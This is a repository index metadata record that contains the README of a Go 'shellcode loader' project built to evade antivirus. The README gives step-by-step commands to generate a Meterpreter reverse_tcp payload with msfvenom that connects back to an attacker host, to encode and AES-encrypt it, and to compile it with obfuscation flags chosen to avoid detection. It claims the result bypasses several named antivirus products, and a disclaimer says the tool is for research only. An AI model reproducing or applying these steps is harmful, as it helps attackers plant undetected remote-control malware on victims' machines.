{"id":13841795,"url":"https://github.com/HZzz2/go-shellcode-loader","last_synced_at":"2025-07-11T13:32:32.938Z","repository":{"id":37352451,"uuid":"500704651","full_name":"HZzz2/go-shellcode-loader","owner":"HZzz2","description":"Go AV-evasion shellcode loader with obfuscation and AES encryption","archived":false,"fork":false,"pushed_at":"2022-07-28T11:56:25.000Z","size":36,"stargazers_count":240,"open_issues_count":6,"forks_count":50,"subscribers_count":5,"default_branch":"main","last_synced_at":"2024-08-05T17:29:05.971Z","etag":null,"topics":["av","go-shellcode","shellcode-encode","shellcode-loader"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/HZzz2.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-06-07T05:41:42.000Z","updated_at":"2024-07-22T05:44:59.000Z","dependencies_parsed_at":"2022-07-20T12:02:25.721Z","dependency_job_id":null,"html_url":"https://github.com/HZzz2/go-shellcode-loader","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HZzz2%2Fgo-shellcode-loader","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HZzz2%2Fgo-shellcode-loader/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HZzz2%2Fgo-shellcode-loader/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HZzz2%2Fgo-shellcode-loader/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/HZzz2","download_url":"https://codeload.github.com/HZzz2/go-shellcode-loader/tar.gz/refs/heads/main","host":{"name":"GitHub","ur
l":"https://github.com","kind":"github","repositories_count":225729674,"owners_count":17515153,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["av","go-shellcode","shellcode-encode","shellcode-loader"],"created_at":"2024-08-04T17:01:21.320Z","updated_at":"2024-11-21T12:30:25.028Z","avatar_url":"https://github.com/HZzz2.png","language":"Go","readme":"# go-shellcode-loader\n\nGo shellcode loader with obfuscation, AV evasion and AES encryption\n\nObfuscation and anti-detection; bypasses DF, 360 and Huorong\n\n\n#### Get the project\n\n```Bash\ngit clone https://github.com/HZzz2/go-shellcode-loader.git\ncd go-shellcode-loader\n# The next command installs the third-party obfuscation tool; GitHub: https://github.com/burrowers/garble\ngo install mvdan.cc/garble@latest    \n\n```\n\n#### Generate the shellcode and base64-encode it\n\n`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw \u003e rev.raw`\n\n`base64 -w 0 -i rev.raw \u003e rev.bs64`\n\n`cat rev.bs64`\n\n**Copy it into line 51 of aes-sc.go, replacing the payload**\n\nRun aes-sc.go to generate the AES-encrypted value\n\n`go run aes_sc.go`\n\nCopy the output value into line 73 of go-sc.go, replacing the payload\n\n#### **Compile to an exe executable**\n\n`garble -tiny -literals -seed=random build -ldflags=\"-w -s -H windowsgui\" -race go-sc.go`\n\nParameter explanation:\n\n  garble (obfuscation tool):\n                          \n                          -tiny                    remove extra information\n                          \n                          -literals               obfuscate literals\n\n                          -seed=random   random base64-encoded seed \n\n  go:\n        \n        -w                        strip debug information; gdb debugging is no longer possible\n\n        -s                         strip the symbol table\n\n        -H windowsgui    hide the execution window so no cmd terminal is occupied. (High detection rate)\n\n        -race                    enables data race detection; this changes the characteristics of the generated file at compile time so that antivirus software cannot detect it; of course, one day this will stop working too.\n\nCompilation produces go-sc.exe\n\n#### 
Detection screenshots\n\n**Huorong**\n\n![image](https://user-images.githubusercontent.com/22775890/172315590-c32aa9ad-0b2b-43cd-a96c-45d971a83ef5.png)\n\n\n**360 Antivirus**\n\n![image](https://user-images.githubusercontent.com/22775890/172315610-9bfa9d41-31a1-42d5-bd54-b0ce3e73318d.png)\n\n\n**360 Safeguard**\n\n![image](https://user-images.githubusercontent.com/22775890/172315642-73266f42-6019-42b7-bb02-5dd59b0925b7.png)\n\n\n\n**DF**\n\n![image](https://user-images.githubusercontent.com/22775890/172315670-89a23a36-5e1f-40e8-b311-a4a22490d1ca.png)\n\n\n\n**virustotal**\n\n![image](https://user-images.githubusercontent.com/22775890/172315706-4fbd57a6-0e14-497a-af91-ea6c7cdf0704.png)\n\n\n\n**ThreatBook Cloud Sandbox**\n\n![image](https://user-images.githubusercontent.com/22775890/172315732-84eb7a75-481c-4904-a341-bd96a336ad87.png)\n\n\n\n\n**Demo run**\n\n\n\n\nhttps://user-images.githubusercontent.com/22775890/172315782-707cfbbb-90ed-4156-97d8-dcaf0da8a554.mp4\n\n\n## Disclaimer\nFor security research and teaching purposes only. If users put it to any other use, they bear all legal and joint liability; the author bears no legal or joint liability.\n","funding_links":[],"categories":["web shell、shellcode","Go"],"sub_categories":["网络服务_其他"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHZzz2%2Fgo-shellcode-loader","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FHZzz2%2Fgo-shellcode-loader","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FHZzz2%2Fgo-shellcode-loader/lists"}